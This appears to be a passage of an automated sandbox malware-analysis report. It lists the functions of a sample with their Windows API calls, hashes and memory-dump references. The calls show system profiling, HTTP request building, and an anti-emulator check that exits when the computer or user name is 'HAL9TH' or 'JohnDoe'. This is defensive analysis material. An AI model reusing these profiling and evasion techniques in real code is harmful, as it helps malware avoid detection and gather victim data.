                                                                                                                                                                                      • Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: HttpInternetlstrcpylstrlen$OpenRequest$AllocConnectInfoLocalOptionQuerySend
                                                                                                                                                                                      • String ID: ERROR
                                                                                                                                                                                      • API String ID: 4174444224-2861137601
                                                                                                                                                                                      • Opcode ID: 7b43e08e2e6e362704c9e284de2831006bd4caf5f4c6c66ff58a5f4974eba01b
                                                                                                                                                                                      • Instruction ID: a055d10b19a0498a24d00d503ca2b4cfda373b7c04c3607c73caa84d8837f8f4
                                                                                                                                                                                      • Opcode Fuzzy Hash: 7b43e08e2e6e362704c9e284de2831006bd4caf5f4c6c66ff58a5f4974eba01b
                                                                                                                                                                                      • Instruction Fuzzy Hash: 84215E319041046BCB27FFB4DC96DEE37A8BE42394B504565F8069E162FF30EB09C690
                                                                                                                                                                                      Function 00343EF3 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 52stringnetworkCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • ??_U@YAPAXI@Z.MSVCRT(00000400,00361C14,ERROR), ref: 00343F1F
                                                                                                                                                                                      • ??_U@YAPAXI@Z.MSVCRT(00000400,00000400,00361C14,ERROR), ref: 00343F28
                                                                                                                                                                                      • ??_U@YAPAXI@Z.MSVCRT(00000400,00000400,00000400,00361C14,ERROR), ref: 00343F31
                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,00000000,?,?,00361C14,ERROR), ref: 00343F4B
                                                                                                                                                                                      • InternetCrackUrlA.WININET(00000000,00000000,?,00361C14), ref: 00343F5B
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CrackInternetlstrlen
                                                                                                                                                                                      • String ID: ERROR
                                                                                                                                                                                      • API String ID: 1274457161-2861137601
                                                                                                                                                                                      • Opcode ID: 2360bb456d0eb11e73010cc8b6856dc6ab39d27e0d4086bc1a03d386a5316723
                                                                                                                                                                                      • Instruction ID: d11a060bd23594cd5d59baab42a1986d2fb0ca8191c9eba3ba280445a168ef34
                                                                                                                                                                                      • Opcode Fuzzy Hash: 2360bb456d0eb11e73010cc8b6856dc6ab39d27e0d4086bc1a03d386a5316723
                                                                                                                                                                                      • Instruction Fuzzy Hash: 90115E71C00608AADF15AFA4EC45ADE7BB8AF05330F108226F925EB2E1DB749705CB90
                                                                                                                                                                                      Function 0034F1BE Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40registrymemoryCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000104,00361678,?,?,?,00352BAA,00000000,?,Windows: ,00000000,?,00361678,00000000,?,Work Dir: In memory), ref: 0034F1D2
                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,?,?,00352BAA,00000000,?,Windows: ,00000000,?,00361678,00000000,?,Work Dir: In memory,00000000,?), ref: 0034F1D9
                                                                                                                                                                                      • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,?,?,?,?,00352BAA,00000000,?,Windows: ,00000000,?,00361678,00000000,?), ref: 0034F207
                                                                                                                                                                                      • RegQueryValueExA.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,00352BAA,00000000,?,Windows: ,00000000,?,00361678,00000000), ref: 0034F223
                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,00352BAA,00000000,?,Windows: ,00000000,?,00361678,00000000,?,Work Dir: In memory,00000000,?), ref: 0034F22C
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                      • String ID: Windows 11
                                                                                                                                                                                      • API String ID: 3466090806-2517555085
                                                                                                                                                                                      • Opcode ID: 6236015f1d6638db699e269849ad638d36c527a79949e449feb02d2c51758df5
                                                                                                                                                                                      • Instruction ID: 22325c63e117edd3c61d709ae010c91e56edb196efbeedeba3a15fa43e240e8e
                                                                                                                                                                                      • Opcode Fuzzy Hash: 6236015f1d6638db699e269849ad638d36c527a79949e449feb02d2c51758df5
                                                                                                                                                                                      • Instruction Fuzzy Hash: D3F04F79200204FFEB119BE1DC0AFAE7ABDFB84740F144024F606EA1A0D6B0A9419B20
                                                                                                                                                                                      Function 0034EB44 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 38memoryCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000104,00361678), ref: 0034EB52
                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 0034EB59
                                                                                                                                                                                      • GlobalMemoryStatusEx.KERNEL32(?,?,00000000,00000040), ref: 0034EB79
                                                                                                                                                                                      • wsprintfA.USER32 ref: 0034EB9F
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Heap$AllocGlobalMemoryProcessStatuswsprintf
                                                                                                                                                                                      • String ID: %d MB$@
                                                                                                                                                                                      • API String ID: 3644086013-3474575989
                                                                                                                                                                                      • Opcode ID: 2c19e5bed5d6cfe42f70aa1d669a75eaeec9cf231191071779a20912d425db51
                                                                                                                                                                                      • Instruction ID: aea6322749fc3cd926e73e64b3cbd04fc9f89d431044b3b53ec23e17251b725b
                                                                                                                                                                                      • Opcode Fuzzy Hash: 2c19e5bed5d6cfe42f70aa1d669a75eaeec9cf231191071779a20912d425db51
                                                                                                                                                                                      • Instruction Fuzzy Hash: FFF012B5604108ABE740DBE4DC5AF7E77BDF744700F444428F706E6191D6B498428A65
                                                                                                                                                                                      Function 0034E769 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 37registrymemoryCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,0034E7DB,0034F1E6,?,?,?,00352BAA,00000000,?,Windows: ,00000000), ref: 0034E77D
                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,?,?,0034E7DB,0034F1E6,?,?,?,00352BAA,00000000,?,Windows: ,00000000,?,00361678), ref: 0034E784
                                                                                                                                                                                      • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,?,?,?,?,0034E7DB,0034F1E6,?,?,?,00352BAA,00000000,?,Windows: ), ref: 0034E7A2
                                                                                                                                                                                      • RegQueryValueExA.KERNEL32(?,CurrentBuildNumber,00000000,00000000,00000000,?,?,?,?,0034E7DB,0034F1E6,?,?,?,00352BAA,00000000), ref: 0034E7BD
                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,0034E7DB,0034F1E6,?,?,?,00352BAA,00000000,?,Windows: ,00000000,?,00361678), ref: 0034E7C6
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                      • String ID: CurrentBuildNumber
                                                                                                                                                                                      • API String ID: 3466090806-1022791448
                                                                                                                                                                                      • Opcode ID: d5374626b5b1ab8efc52818fadd754990100f99c7fd59500ff6a5b5dc5f19396
                                                                                                                                                                                      • Instruction ID: 122c041dd1187019274384eeb0febc29438123bde858fc163c79e159385cc567
                                                                                                                                                                                      • Opcode Fuzzy Hash: d5374626b5b1ab8efc52818fadd754990100f99c7fd59500ff6a5b5dc5f19396
                                                                                                                                                                                      • Instruction Fuzzy Hash: 37F03075144204BFEB119BD1DC0EFAE7ABCEB44B44F104068F606A90A1DAB06A819B24
                                                                                                                                                                                      Function 00353A96 Relevance: 9.1, APIs: 6, Instructions: 118registrystringCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • memset.MSVCRT ref: 00353ABD
                                                                                                                                                                                      • RegOpenKeyExA.KERNEL32(80000001,00000000,00020119,?), ref: 00353ADA
                                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?), ref: 00353AFA
                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00353B03
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,?,?,00000104), ref: 00353B29
                                                                                                                                                                                      • lstrcatA.KERNEL32(?), ref: 00353B3C
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: lstrcat$CloseOpenQueryValuememset
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2623679115-0
                                                                                                                                                                                      • Opcode ID: ee93e36e138b3108d331e38aaebbf68dc49228518c8da63f1e367533a03a770a
                                                                                                                                                                                      • Instruction ID: 6301728beada7fbd6c70a621eecedea021a372d4d0030a839efcda53cfc1380f
                                                                                                                                                                                      • Opcode Fuzzy Hash: ee93e36e138b3108d331e38aaebbf68dc49228518c8da63f1e367533a03a770a
                                                                                                                                                                                      • Instruction Fuzzy Hash: 9B4179B690010DBBDF11EFF0CC46DED7BBCAB04344F0045A1F9499A161E671AB998FA1
                                                                                                                                                                                      Function 003469A2 Relevance: 9.1, APIs: 6, Instructions: 66filememoryCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00361ECC), ref: 003469C0
                                                                                                                                                                                      • GetFileSizeEx.KERNEL32(00000000,?), ref: 003469D7
                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,?,?,0035E266), ref: 003469F3
                                                                                                                                                                                      • ReadFile.KERNEL32(?,00000000,?,?,00000000,?,0035E266), ref: 00346A0D
                                                                                                                                                                                      • LocalFree.KERNEL32(?,?,0035E266), ref: 00346A23
                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00346A2E
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2311089104-0
                                                                                                                                                                                      • Opcode ID: d969a12c382c4be13e29490fb39b39ec68e13046e31c4656311001693087d2be
                                                                                                                                                                                      • Instruction ID: df7ba9818f57ac525f3a3ee99ad4d7939da98e4541fd355cb0b10accb245c3a9
                                                                                                                                                                                      • Opcode Fuzzy Hash: d969a12c382c4be13e29490fb39b39ec68e13046e31c4656311001693087d2be
                                                                                                                                                                                      • Instruction Fuzzy Hash: BD1130B1510505AFEB11EFE4DC8ADAE7BBCFB05354F148429FA02EA150DB30AE95CB61
                                                                                                                                                                                      Function 0034EFBA Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54stringCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • memset.MSVCRT ref: 0034EFF5
                                                                                                                                                                                        • Part of subcall function 0034FC4F: malloc.MSVCRT ref: 0034FC58
                                                                                                                                                                                        • Part of subcall function 0034FC4F: strncpy.MSVCRT ref: 0034FC68
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00000000), ref: 0034F025
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,003618AC), ref: 0034F03F
                                                                                                                                                                                      • GetCurrentHwProfileA.ADVAPI32(?), ref: 0034EFCA
                                                                                                                                                                                        • Part of subcall function 0034E57D: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00355870,0035E266), ref: 0034E5A7
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: lstrcat$CurrentProfilelstrcpymallocmemsetstrncpy
                                                                                                                                                                                      • String ID: Unknown
                                                                                                                                                                                      • API String ID: 277847849-1654365787
                                                                                                                                                                                      • Opcode ID: 8e4691a3db0015e82c1eb05b0faa0e2983cae7a1642b2a2463f780018c8862a3
                                                                                                                                                                                      • Instruction ID: fd9ed0778b2fa4d534a86804a01fbe5098eccdf600c84e1a00cc51e45018a0cb
                                                                                                                                                                                      • Opcode Fuzzy Hash: 8e4691a3db0015e82c1eb05b0faa0e2983cae7a1642b2a2463f780018c8862a3
                                                                                                                                                                                      • Instruction Fuzzy Hash: FC110D71D00109ABDB15EBB0DC96EDD77AC6B01304F4445A6B20AAF091EE70A785CB90
                                                                                                                                                                                      Function 00341043 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19stringCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 0034E816: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,0034104D,HAL9TH,003555D9), ref: 0034E822
                                                                                                                                                                                        • Part of subcall function 0034E816: HeapAlloc.KERNEL32(00000000,?,?,?,0034104D,HAL9TH,003555D9), ref: 0034E829
                                                                                                                                                                                        • Part of subcall function 0034E816: GetComputerNameA.KERNEL32(00000000,?), ref: 0034E83D
                                                                                                                                                                                      • strcmp.MSVCRT ref: 0034104E
                                                                                                                                                                                        • Part of subcall function 0034E7E4: GetProcessHeap.KERNEL32(00000000,00000104,?,HAL9TH,?,00341063,JohnDoe,003555D9), ref: 0034E7F0
                                                                                                                                                                                        • Part of subcall function 0034E7E4: HeapAlloc.KERNEL32(00000000,?,HAL9TH,?,00341063,JohnDoe,003555D9), ref: 0034E7F7
                                                                                                                                                                                        • Part of subcall function 0034E7E4: GetUserNameA.ADVAPI32(00000000,?), ref: 0034E80B
                                                                                                                                                                                      • strcmp.MSVCRT ref: 00341064
                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 00341070
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
